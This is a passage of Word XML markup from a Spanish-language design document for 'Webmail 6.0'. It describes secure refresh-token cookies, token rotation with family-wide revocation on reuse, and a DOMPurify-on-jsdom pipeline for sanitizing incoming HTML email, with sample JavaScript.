          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tokenId</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ecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">604800</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familyId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Identificador de familia de tokens</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">issuedAt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userAgent</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'user-agent'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ipAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ip</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La cookie que transporta el refresh token al navegador tiene los siguientes atributos de seguridad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(inaccesible para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en JavaScript),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(solo se transmite por HTTPS),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(no se envía en peticiones cross-origin),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Path=/auth/refresh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(scope limitado al endpoint de refresh).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkStart w:id="144" w:name="X625ce8ae870ca352080d1be9544fd4bd37e035d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2.3 Rotación con token families, detección de reúso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La rotación de refresh tokens es obligatoria: cada vez que un refresh token se utiliza para obtener un nuevo access token, se genera un nuevo refresh token y el anterior se marca como consumido. Esto limita la ventana de oportunidad para un atacante que robe un refresh token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El sistema de familias de tokens agrupa todos los refresh tokens emitidos a partir de un mismo login inicial bajo un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">familyId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compartido. Si un refresh token ya consumido se utiliza nuevamente (indicando un posible robo), toda la familia se revoca inmediatamente y el usuario debe re-autenticarse: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rotateRefreshToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(oldTokenId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> familyId) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> oldToken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">oldTokenId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oldToken </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> oldToken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'revoked'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Posible reúso detectado: revocar toda la familia</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">revokeFamily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(familyId)</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SecurityError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Token reuse detected. Full re-authentication required.'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Marcar como consumido, emitir nuevo token</w:t>
      </w:r>
      <w:r>
        <w:br/>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setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">oldTokenId</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ecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">604800</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">oldToken</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'consumed'</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newTokenId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">randomBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">newTokenId</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ecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">604800</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familyId</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newTokenId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkEnd w:id="145"/>
    <w:bookmarkStart w:id="149" w:name="html-sanitization-pipeline"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 HTML Sanitization Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El pipeline de sanitización de HTML es la pieza crítica que diferencia a Webmail 6.0 de clientes vulnerables como Roundcube. Opera como una cadena de procesamiento secuencial donde cada etapa recibe la salida de la anterior.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="146" w:name="dompurify-con-jsdom-no-happy-dom"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3.1 DOMPurify con jsdom (no happy-dom)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La elección de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jsdom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sobre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">happy-dom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como entorno DOM subyacente no es arbitraria. DOMPurify depende del parser HTML del navegador para construir el árbol DOM que luego recorre y limpia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jsdom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utiliza el parser HTML5 de estándar de la WHATWG, mientras que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">happy-dom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implementa su propio parser con optimizaciones de rendimiento que pueden diferir sutilmente en el manejo de HTML malformado o técnicas de obfuscación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[53]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. En seguridad, la conformidad estricta con el estándar es prioritaria sobre la velocidad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El pipeline completo para un correo HTML entrante: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sanitizeEmailHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(rawHtml) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Paso 1: Inlinear CSS externo con Juice</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> inlined </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">juice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(rawHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">webResources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Paso 2: Sanitizar con DOMPurify sobre jsdom</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sanitized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(inlined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EMAIL_CONFIG)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Paso 3: Filtrar propiedades CSS peligrosas del style inline</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> filtered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">filterCssProperties</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(sanitized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALLOWED_CSS_PROPS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Paso 4: Inyectar nonce CSP y envolver en sandboxed iframe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wrapInSandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(filtered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">generateNonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="146"/>
    <w:bookmarkStart w:id="147" w:name="Xf22aea77704e63d0f82f53945c42d03f83510de"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3.2 Configuración allowedTags/allowedAttributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La lista blanca de elementos HTML permitidos se basa en el subconjunto seguro identificado por OWASP y Cure53. Elementos activos como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;object&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;embed&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input&gt;</w:t>
      </w:r>
      <w:r>
